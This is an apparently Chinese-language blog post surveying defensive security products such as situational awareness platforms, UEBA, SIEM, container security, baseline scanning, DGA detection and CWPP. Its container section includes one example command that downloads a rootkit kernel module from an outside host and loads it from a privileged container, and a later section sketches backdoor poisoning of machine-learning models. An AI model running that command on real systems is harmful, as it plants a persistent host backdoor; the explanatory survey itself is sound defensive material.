主流的态势感知产品支撑技术都是相近的,一般而言,态势感知产品定位为客户的安全大脑,是一个检测、预警、响应处置的大数据安全分析平台。其以全流量分析为核心,结合威胁情报、行为分析建模、UEBA、失陷主机检测、图关联分析、机器学习、大数据关联分析、可视化等技术,对全网流量实现全网业务可视化、威胁可视化、攻击与可疑流量可视化等,帮助客户在高级威胁入侵之后,损失发生之前及时发现威胁。
全流量分析,是做很多安全产品的基础工作,因为再高级的攻击,都会留下网络痕迹,哪怕做了混淆,或者故意模仿正常访问,但是在大数据的建模分析下一切都会现身。为了进行流量分析,首先需要拿到流量。通过旁路镜像的方法获取网络流量,并针对已知网络协议实时解码、元数据提取(非常用的或者私有的协议需大量资源进行分析,有时也会由于回话秘钥的问题无法解开,而且由于出现频率也不高,很多产品并没有做这一步),此时可以做两方面的工作,一是通过深度的网络会话关联分析、数据包解码分析、载荷内容还原分析、特征分析和日志分析,还原黑客的kill chain,对网络安全事件进行精准的定性分析,二是快速提取多维度的网络元数据进行异常行为建模,为后续异常数据挖掘、分析、取证建立扎实的基础。分析之后,还要保存起来,方便查询检索及关联回溯分析,实现从线索挖掘到整个攻击过程的完整复盘,为安全事件的准确响应提供依据。
威胁情报,主要从四个方面判断质量,相关性,及时性,精确性,决策性,这一块笔者接触的也不多,也不清楚我司的产品是如何处理这一块的,但是如果是我做的话会考虑直接从这一细分领域企业那儿接过来,或者体量较大的乙方自身在业内是有十余年甚至数十年的积累的,也可以选择开源威胁情报如open-threat-exchange。
UEBA,即用户实体行为分析,与它常常一起出现的还有SIEM,SoC。先来说下UEBA,主要用于解决以下问题:账号失陷检测,主机失陷检测,数据泄漏检测,内部用户滥用,提供事件调查的上下文等。
技术架构一般如上,可见UEBA在第一步是数据驱动的,需要从产品、日志得到支持,然后是规则驱动,接下来是算法驱动,最后才能尽可能准确刻画出用户画像。再说说UEBA和SIEM的关系,SIEM即安全信息及事件管理,主要是提供一种统一的路径方法来综合处理数据及关联分析。由于数据量及复杂度增加,SIEM的管理能力到了天花板,这才有了UEBA。UEBA 为SIEM 数据添加了背景信息和分析,并为实体组织的事件提供风险评分,使分析师能够确定最高风险的优先级。随着技术的发展,UEBA又作为子集融合进了态势感知产品。
可视化,其实是为了方便客户了解旗下资产安全情况而做的,将一些复杂的数据图形化使之更容易的感知。可以直观展示企业在全网范围内的资产安全状况、最新待处理威胁、风险事件、安全事件趋势等,并运用安全评分、趋势图、柱状图、分布图等直观图形,实现可视化展示。同时结合平台所收集、加工、分析后的多维数据直观查看结果,方便安全运维人员及时发现、处理威胁,从而帮助客户有效洞察企业所面临的外部威胁和内部脆弱性风险,也极大的提高了安全运维团队的监测、管理、处置安全事件的效率。
16. 等保一体机
全名叫做信息安全等级保护,顾名思义就是指根据信息系统在国家安全、社会稳定、经济秩序和公共利益方便的中重要程度以及风险威胁、安全需求、安全成本等因素,将其划分不同的安全保护等级并采取相应等级的安全保护技术、管理措施、以保障信息系统安全和信息安全。
可能有点绕,总结下就是:保护互联网数据的一种标准方法体系,里面规定了方方面面。
1、降低信息安全风险,提高信息系统的安全防护能力;
2、满足国家相关法律法规和制度的要求;
3、满足相关主管单位和行业要求;
4、合理地规避或降低风险。
17. 容器安全
Reference:https://zhuanlan.zhihu.com/p/112789529
云原生的代表技术包括容器、服务网格(Service Mesh)、微服务(Microservice)、不可变基础设施和声明式API。更多对于云原生的介绍请参考CNCF/Foundation。
我们再对容器安全做一层抽象,又可以看作构建时安全(Build)、部署时安全(Deployment)、运行时安全(Runtime)。
- 镜像安全由容器镜像分析平台保障。它以规则引擎的形式运营监管容器镜像,默认规则支持对镜像中Dockerfile、可疑文件、敏感权限、敏感端口、基础软件漏洞、业务软件漏洞以及CIS和NIST的最佳实践做检查,并提供风险趋势分析,同时它确保部分构建时安全。
- 运行安全主要是解决以容器逃逸为模型构建的风险: Linux内核漏洞:容器的内核与宿主内核共享,使用Namespace与Cgroups这两项技术,使容器内的资源与宿主机隔离,所以Linux内核产生的漏洞能导致容器逃逸。经典的Dirty CoW 容器自身:Docker本身由Docker(Docker Client)和Dockerd(Docker Daemon)组成。但从Docker 1.11开始,Docker不再是简单的通过Docker Dameon来启动,而是集成许多组件,包括containerd、runc等等。 Docker Client是Docker的客户端程序,用于将用户请求发送给Dockerd。Dockerd实际调用的是containerd的API接口,containerd是Dockerd和runc之间的一个中间交流组件,主要负责容器运行、镜像管理等。containerd向上为Dockerd提供了gRPC接口,使得Dockerd屏蔽下面的结构变化,确保原有接口向下兼容;向下,通过containerd-shim与runc结合创建及运行容器。更多的相关内容,请参考文末链接runc、containerd、architecture。了解清楚这些之后,我们就可以结合自身的安全经验,从这些组件相互间的通信方式、依赖关系等寻找能导致逃逸的漏洞。CVE-2019-5736:runc - container breakout vulnerability
- 不安全部署:
不同的业务会根据自身业务需求提供一套自己的配置,而这套配置并未得到有效的管控审计,使得内部环境变得复杂多样,无形之中又增加了很多风险点。最常见的包括:
- 特权容器或者以root权限运行容器;
- 不合理的Capability配置(权限过大的Capability)。
面对特权容器,在容器内简单地执行一下命令,就可以轻松地在宿主机上留下后门: $ wget https://kernfunny.org/backdoor/rootkit.ko && insmod rootkit.ko
18. 基线检测
基线 检查功能通过配置不同的基线检查策略,可以帮助您快速对服务器进行批量扫描,发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点,并提供修复建议和一键修复功能。
检测页面:
基线内容:
基线分类 | 检查标准及检查内容 | 覆盖的系统和服务 | 修复紧急度说明 |
|---|---|---|---|
弱口令 | 使用非登录爆破方式检测是否存在弱口令。避免登录爆破方式锁定账户影响业务的正常运行。说明弱口令检测是通过读取HASH值与弱口令字典计算的HASH值进行对比来检查是否存在弱口令。如果不想读取HASH值,您可以从基线检查策略中移除弱口令基线。 | * 操作系统Linux、Windows* 数据库MySQL、Redis、SQL Server、MongoDB、PostgreSQL、Oracle* 应用Tomcat、FTP、Rsync、SVN、Activemq、RabbitMQ、OpenVpn、Jboss6/7、Jenkins、Openldap、VncServer、pptpd | 需紧急修复。避免弱口令暴露在公网上导致系统被入侵或发生数据泄露事件。 |
未授权访问 | 未授权访问基线。检测服务是否存在未授权访问风险,避免被入侵或者数据泄露。 | Memcached、Elasticsearch、Docker、CouchDB、Zookeeper、Jenkins、Hadoop、Tomcat、Redis、Jboss、ActiveMQ、RabbitMQ、openLDAP、rsync、Mongodb Postgresql | |
最佳安全实践 | 阿里云标准基于阿里云最佳安全实践标准检测是否存在账号权限、身份鉴别、密码策略、访问控制、安全审计和入侵防范等安全配置风险。 | * 操作系统* CentOS 6、7、8* Redhat 6、7、8* Ubuntu 14、16、18、20* Debian 8、9、10* Aliyun Linux 2、3* Windows 2008R2、2012R2、2016、2019* Rocky Linux 8* Alma Linux 8* SUSE Linux 15* Anolis 8* 麒麟* UOS* 数据库MySQL、Redis、MongoDB、SQL server、Oracle 11g、CouchDB、Influxdb、PostgreSql* 应用Tomcat、IIS、Nginx、Apache、Windows SMB、RabbitMQ、Activemq、ElasticSearch、Jenkins Hadoop、Jboss6/7、Tomcat | 重要安全加固项,建议修复。基于最佳安全实践的加固标准,降低配置弱点被攻击和配置变更风险。 |
容器安全 | 阿里云标准基于阿里云容器最佳安全实践的Kubernetes Master和Node节点配置风险检查。 | * Docker* Kubernetes集群 | |
等保合规 | 等保二级、三级合规基于服务器安全等保基线检查。对标权威测评机构安全计算环境测评标准和要求。 | * 操作系统* CentOS 6、7、8* Redhat 6、7、8* Ubuntu 14、16、18、20* SUSE 10、11、12、15* Debian 8、9、10* Aliyun Linux 2、3* Windows 2008R2、2012R2、2016、2019* Anolis 8* 麒麟* UOS* 数据库Redis、MongoDB、PostgreSql、Oracle、MySql、SQL Server、Informix* 应用Websphere Application Server、Jboss6/7、Nginx、Weblogic、Bind、IIS | 基于业务是否有合规需要进行修复。 |
CIS合规 | 基于CIS标准的操作系统安全基线检查。 | * CentOS 6、7、8* Ubuntu 14、16、18、20* Debian 8、9、10* Aliyun Linux 2* Windows 2008R2、2012R2、2016、2019 | 基于业务是否有合规需要进行修复。 |
自定义基线 | 支持CentOS Linux 7自定义基线,可对基线检查策略中的检查项进行编辑,自定义安全加固项。 | CentOS 7、CentOS6、Windows 2008R2、2012R2、2016、2019 | 用户自定义的安全加固项,建议修复。基于最佳安全实践的加固标准,降低配置弱点被攻击和配置变更风险。 |
19. 云沙箱
沙箱技术云上部署,可以向他投递文件或者url
只消一两分钟,我就能答复:它是不是恶意文件,是不是钓鱼、带毒网站,是不是跟某个黑客团伙有关联……
检测手段:
- 多杀毒引擎检测
- 沙箱内静态分析——记录文件的样貌,比如基础信息(文件格式、大小、文件指纹、签名等等)以及元数据等等。
- 沙箱内动态分析——记录文件的所有行为,包括具体执行流程、创建了哪些进程、释放了哪些文件等等。
- 情报分析
21. UEBA(User and Entity Behavior Analytics,用户和实体行为分析)
从UEBA的概念可以看出,UEBA技术不仅检测人的异常行为,也检测实体的异常行为,我们先通过2个例子来直观地感受一下UEBA的功能。
例如,某企业职员每天的工作时间段是早8点到晚5点,外发的文件数量为几十个,总大小也不超过100MB。但是有一天该职员突然工作到晚上11点,外发文件大小超过100GB,UEBA就会认为这是异常行为,并发出告警信息。如果网络中部署了自动响应与处置类的功能,还可以自动隔离该职员的办公设备,令其无法联网,并锁定该职员的所有账号权限,等待运维人员处理完异常后再重新开放权限。
相较于人的异常行为,实体的异常行为往往并不容易发现,甚至发现了也会被忽略。例如,某企业的服务器对外提供服务,一般凌晨时段的访问请求非常少,但是某天凌晨的访问请求突然增多,且该服务器开始与网络内的其他服务器进行文件传输,这大概率会触发UEBA的告警。如果没有UEBA,由于传统安全设备主要关注网络边界的安全性,所以该服务器的异常行为并不会触发告警,也不会被拦截,这为企业的网络安全埋下了巨大隐患。
UEBA利用人工智能和机器学习算法来检测网络中的用户和实体的异常行为。首先,UEBA收集有关用户和实体活动的数据,通过分析数据来建立用户和实体的行为模式基线。然后,UEBA会持续监控用户和实体行为,并将其当前行为与基线行为进行比较,计算风险评分,确定行为偏差是否可接受。如果风险评分超过一定的阈值,UEBA会实时向用户发出告警。
风险评分是基于威胁的严重和紧急程度等因素评定的,可以帮助运维人员识别最优先处理的威胁,提高威胁的处置效率。例如,用户多次登录失败,可以生成一个较低的风险评分;而用户向外发送超过10GB的文件,且其中很多文件的名称命中了敏感字,这就应该生成一个较高的风险评分。
为了保证生成基线的准确性,UEBA会从尽可能多的来源中获取数据,通常包括:
- 从防火墙、路由器、服务器等设备中获取日志信息。
- 从其他安全解决方案(例如SIEM)或工具中获取相关数据。
- 从访问控制和身份验证系统中获取用户账户及授权等信息。
- 从企业自身的管理系统中获取员工的相关信息。
- 从社交平台和社交软件中获取用户的相关信息。
生成基线后,UEBA在识别内部威胁方面特别有效,而这类威胁往往是很难检测出来的。试想一下,当攻击者获取了企业职员的账户权限,或者企业内部的职员心存恶念,他们都在使用正常的权限去做坏事,完全不借助恶意软件。这怎么能被发现呢?此时就体现了UEBA的价值,因为攻击者或企业职员在实施恶意行为的时候,必然会偏离正常的行为基线。例如,攻击者或企业职员想窃取企业内部的关键数据,那么就要访问高密级的系统或文件,而这个行为在UEBA中可能会被赋予很高的风险评分,当UEBA发现此异常行为后就会立即生成告警。
22. SIEM(Security Information and Event Management)
Reference:https://www.zhihu.com/question/498644721/answer/3015102374
SIEM是安全信息管理(SIM)和安全事件管理(SEM)的结合体。它从各种安全设备收集信息,监视和分析这些信息,然后以对企业有意义的方式呈现结果。SIEM的核心功能包括跟踪、日志记录、收集和管理安全数据以符合合规或审计目的,包括报告、数据聚合、安全监测和用户活动监测等操作功能:
- 发实时收集和分析来自不同安全设备和系统的日志和事件数据
- 自动化识别和分类安全事件,并进行威胁情报分析和挖掘
- 提供可视化的安全事件分析和报告,以帮助安全团队及时发现和解决安全问题
- 提供事件响应和处置功能,支持自动化响应和手动处置
- 支持合规性审计和报告,以符合法规和标准要求。
最佳实践:
23. 流量水印
匿名通信和跳板技术与手段的使用给攻击源追踪、 网络监管和攻击取证等带来严峻挑战 。相对于传统的被动流量分析而言 ,网络流水印 (NetworkFlowWatermarking) 作为一种主动流量分析手段 ,可用于追踪通过跳板链进行的网络攻击源或采取匿名通道进行非法通信的恶意用户。通过向发送者的发送流量中主动添加水印 (Watermark)来帮助确认发送者和接收者的通信关系,网络流水印技术具有准确率高、误报率低、观测时间短和所需观测数据包数量少等优点
技术:
改变或调制发送端数据包的载荷 (Payload)、时间间隔(Interva1)、间隔到达时延 (Inter-PacketDelay,IPD)和 间隔重心 (ItervalCentroid)等信息或流量速率 (TrafficRate)来嵌入水印 ,在接收端识别该水印 ,以达到关联发送者和接收者关系的目的
当网络数据流经过水印嵌入点 (如路由器 )时 ,嵌入器使用密钥 (Key)将水印进行 编码 ,通过调制流量特征 (改变数据流的速度 )嵌入该水印 。嵌入水印后的标记数据流在网络传输时会遭受一些干扰和变形 ,如中间路由器 (或匿名网络 、 跳板等)的延迟 、丢包或重传数据包 、包重组和时间扰乱等 。 最终 ,当被扰乱之后的标记数据流到达 印检测点 ,检测器使用与嵌入器同样的密钥 (非盲检测时 ,检测器还需要标记数据流嵌入水印前的相关信息)提取标记数据流中的水印信息,如果与编码时的水印一致 ,那么就认为这两条数据 流之间存在关联 。
24. IP/域名信誉
一些威胁情报,海量的黑IP和黑域名,一般来说都是10G起步
25. IOC(indicator of compromise 陷落标识)
失陷检测情报,即攻击者控制被害主机所使用的远程命令与控制服务器情报。情报的IOC往往是域名,IP,URL形式,有时也包括SSL证书,HASH等形式,这种IOC可以推送到不同的安全设备中,如NGFW,IPS,SIEM等,进行检测发现甚至实时阻断,这类情报基本上都会提供危害等级,攻击团伙,恶意家族等更加丰富的上下文信息,来帮助确定事件优先级并指导后续安全响应活动。使用这类情报是及时发现已经渗透的到组织的APT团伙,木马蠕虫的最简单,及时,有效的方式。
26. BOT防护
在互联网行业,Bot 一般指的是在 Web、APP 应用、API 接口上通过运行自动化程序执行重复任务的虚拟机器人,它们有的动作比人类快很多,有的行为则很隐蔽不易被发现,这些机器人所产生的活动日志被称为 Bot 流量(机器人流量)。
类别 | 描述 | 举例 |
|---|---|---|
网络爬虫 | 用于浏览互联网并收集信息的自动化程序 | 下载机器人、图片爬虫、文字爬虫 |
恶意软件Bot | 用于执行恶意活动,如传播病毒、窃取敏感信息等的自动化程序 | 外挂 |
社交媒体Bot | 在社交媒体平台上执行自动化任务的程序,有时用于误导用户或传播虚假信息 | 僵尸粉、控评机器人 |
聊天机器人 | 用于与人类进行自动化对话的程序,常见于客户支持、在线聊天等场景 | 客服机器人 |
网络钓鱼Bot | 用于进行网络钓鱼活动,试图欺骗用户提供敏感信息的自动化程序 | - |
游戏Bot | 在在线游戏中使用,自动执行特定游戏任务的程序,有时被用于非法活动或作弊 |
技术架构:
特征工程-》规则管理-》策略下发
27. 模型投毒
后门攻击:通过改变模型对一些特定输入的输出而达到目的,在图像分类的领域中,后门攻击的trigger(触发器)是图像当中的一些像素点,当这些像素点经过模型被计算成某些值之后,模型可能就会产生我们想要的结果,这就达到了我们的目的。
后门攻击是将毒化后的数据集打上对应的标签然后放到模型中进行训练,随后得到一个被植入后门的模型,然后我们将毒化的数据集放入模型时就会输出我们想要的结果。
28. DGA(Domain Generation Algorithm)
恶意软件利用DGA算法与C2服务器进行通信的原理如图所示,客户端通过DGA算法生成大量备选域名,并且进行查询,攻击者与恶意软件运行同一套DGA算法,生成相同的备选域名列表,当需要发动攻击的时候,选择其中少量进行注册,便可以建立通信,并且可以对注册的域名应用速变IP技术,快速变换IP,从而域名和IP都可以进行快速变化。
很显然,在这种方式下,传统基于黑名单的防护手段无法起作用,一方面,黑名单的更新速度远远赶不上DGA域名的生成速度,另一方面,防御者必须阻断所有的DGA域名才能阻断C2通信,因此,DGA域名的使用使得攻击容易,防守困难。
DGA算法由两部分构成,种子(算法输入)和算法,可以根据种子和算法对DGA域名进行分类,DGA域名可以表示为AGD(Algorithmically-Generated Domains)。
按照种子进行分类
种子是攻击者和客户端恶意软件共享的一个DGA算法的输入参数之一,不同的种子得出的DGA域名是不一样的。一般来说,种子可按如下方式进行分类:
1.基于时间的种子(Time dependence)。DGA算法将会使用时间信息作为输入,如:感染主机的系统时间,http响应的时间等。
2.是否具有确定性(Determinism)。主流的DGA算法的输入是确定的,因此AGD可以被提前计算,但是也有一些DGA算法的输入是不确定的,如:Bedep[4]以欧洲中央银行每天发布的外汇参考汇率作为种子,Torpig[5]用twitter的关键词作为种子,只有在确定时间窗口内注册域名才能生效。
根据种子的分类方法,DGA域名可以分为以下4类:
1.TID(time-independent and deterministic),与时间不相关,可确定;
2.TDD(time-dependent and deterministic),与时间相关,可确定;
3.TDN(time-dependent and non-deterministic),与时间相关,不可确定;
4.TIN(time-independent and non-deterministic),与时间不相关,不可确定;
按照生成算法进行分类
现有DGA生成算法一般可以分为如下4类:
1.基于算术。该类型算法会生成一组可用ASCII编码表示的值,从而构成DGA域名,流行度最高。
2.基于哈希。用哈希值的16进制表示产生DGA域名,被使用的哈希算法常有:MD5,SHA256。
3.基于词典。该方式会从专有词典中挑选单词进行组合,减少域名字符上的随机性,迷惑性更强,字典内嵌在恶意程序中或者从公有服务中提取。
4.基于排列组合。对一个初始域名进行字符上的排列组合。
检测手段:
域名情报+数据训练(收集DGA域名,其中包含约4570万个DGA域名,包含62个DGA家族,另外收集收集了大量良性NXDomain,包含1530万个域名,以这些数据为原始输入,进行有监督学习。)
29. MSSP(Managed Security Service Provider,安全托管服务商)
MSS:
Managed Security Service,安全托管服务。通常指为客户提供安全运营管理服务的供应商。安全托管服务在云计算领域,指企业由于降本增效或专注业务发展等需要,将部分繁重、重复安全运营工作托付给专业云服务商,有专业安全运营团队开展的持续分析及运营服务。 企业转向托管安全服务提供商可以减轻他们每天面临的与信息安全有关的压力,借助安全托管服务商在某些安全领域的优势,可以补齐企业在安全建设或运营管理中的短板,提升安全管理效率。 MSSP:Managed Security Service Provider,安全托管服务商。通常指为客户提供安全运营管理服务的供应商。
MSS服务一般包括哪些内容?
- 全面的资产安全评估服务:包括主机、网络、应用及数据方面存在的风险,全面排查云上主机可能存在的风险。
- 细致深入的风险检测服务:周期性漏洞检测和管理服务,对高危端口、系统漏洞、Web漏洞、云产品配置、Web后台信息泄露等进行扫描排查。
- 专业的漏洞情报服务:包括但不限于互联网上影响自身资产的新高危漏洞情报监控、PoC利用分析及预警、云密钥泄露事件监控、分析及预警等
- 可信赖的监控处置服务:针对互联网上存在的一些典型的高危攻击行为和事件,能够借助SOAR以及自身情报能力,具备高级别事件监控筛选、情报关联分析和自动化阻断能力,解决重复劳作,提升安全人效;
- 可落地的安全加固服务:针对发现的严重或高危级别安全事件和风险,提供可落地的处置响应建议
- 尽职尽责的7*24应急响应:在业务遭受黑客攻击出现异常时,具备专业应急值守团队,能够提供及时的事件响应分析和专业处置,将突发事件损失降到最低。
31. CWPP(Cloud Workload Protection Platform,云工作保护平台)
Reference:https://zhuanlan.zhihu.com/p/590228643
客户使用云提供商的主机进行业务上云,那么CWPP就是为了云上主机的防护,包括虚拟机防护和网络安全防护
云上防护最好的方式就是基于云服务提供商提供的接口来进行安全开发处理,但是实际上云服务提供商众多,接口也各不相同,所具备的安全能力也不尽相同,没有统一的标准去做这些安全。基于这一现状,出现了以agent形式的CWPP安全方案。
加固、配置与漏洞管理(Hardening, Configuration and Vulnerability Management):加固是针对系统、镜像等的加固,通过关闭非必要功能、端口和服务,及时进行系统补丁更新维护。配置即为服务器的配置优化,是针对操作系统层和应用层进行配置,保障系统以及应用的安全合理性,以提升安全能力以及防攻击的功能,避免因为错配和漏配导致产生安全问题。漏洞管理是针对操作系统漏洞和应用程序漏洞的管理,在网络安全事件中,基于漏洞的攻击数量一直居高不下,而最常见的最严重的漏洞就是系统漏洞和WEB应用漏洞。因为WEB应用一般对外提供,所以必须暴露与互联网之中,因此安全要求极为重要。基于上述的能力要求,CWPP需要支持针对系统的加固,以及配置的基线检查和漏洞防护的功能。漏洞管理,分为操作系统漏洞管理和应用漏洞管理。目前网络攻击主要是通过web服务器或者web应用漏洞发起,因此CWPP产品要能提供标准化、同时支持制定自定义的web应用漏洞防护策略。
基于身份的网络微隔离和可视化(Network Firewalling, Visibility and Microsegmentation):在这一能力要求中,包括了两个部分内容,分别是微隔离和可视化。想要实现微隔离和可视化的前提,就是要先识别资产,只有在资产被识别后才可以针对资产进行管理,这里所说的资产可以是主机、虚拟机、容器等工作负载,所以图形化管理用户的主机业务资产是CWPP的必要条件。微隔离,就是在资产识别基础之上手动或者自动的进行流量的隔离,这里的隔离主要是东西向流量的隔离,微隔离的基本实现方式是通过agent控制本地的安全程序,如管理windows和linux系统内置的防火墙,来进行流量分割管理。并且这里的流量分割管理是可以跨物理、虚拟架构、网络基于角色的访问策略。可视化要求能够提供可视化和监控通信流量,即能知道工作负载间的通信情况。
CWPP与EDR(Endpoint Detection & Response,终端检测和响应)两个安全产品,在功能上有很多重叠的部分,比如两款产品均具备资产识别、漏洞与补丁管理和基线检查的功能。
差异点 | EDR | CWPP |
|---|---|---|
防护对象 | 终端 | 主机(服务器、容器、serverless) |
产品架构 | EDR一般使用轻代理方式,本地放置引擎和规则库等,本地客户端具备管理界面,可以独立使用。 | CWPP是轻端重云架构,管理都放在云端,本地无规则库和分析引擎,本地客户端没有管理界面,主打轻量化业务无侵害。 |
部署场景 | 部署与企业办公网络中,针对日常办公终端使用,部分情况可以用于数据中心。 | 主要定位在数据中心维度,强调混合数据中心下的统一部署和管理。 |
产品关注点 | 关注重点在于病毒防护,针对事中阶段进行拦截处置,强调的是安全问题闭环处置。 | 更关注基础运维相关的内容如:资产管理、进程监控、变更管理、日志管理、权限管理、基线管理、系统完整性监控、应用程序控制,行为监控等,更聚焦在日常性的基础运维工作。 |
使用阶段 | 主要用于安全事件的事中阶段处理和事后阶段闭环。 | 主要用于安全事件的事前阶段,强调加固的重要性,做事前防护。 |
=====================分割线===============================
持续更新ing~~
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。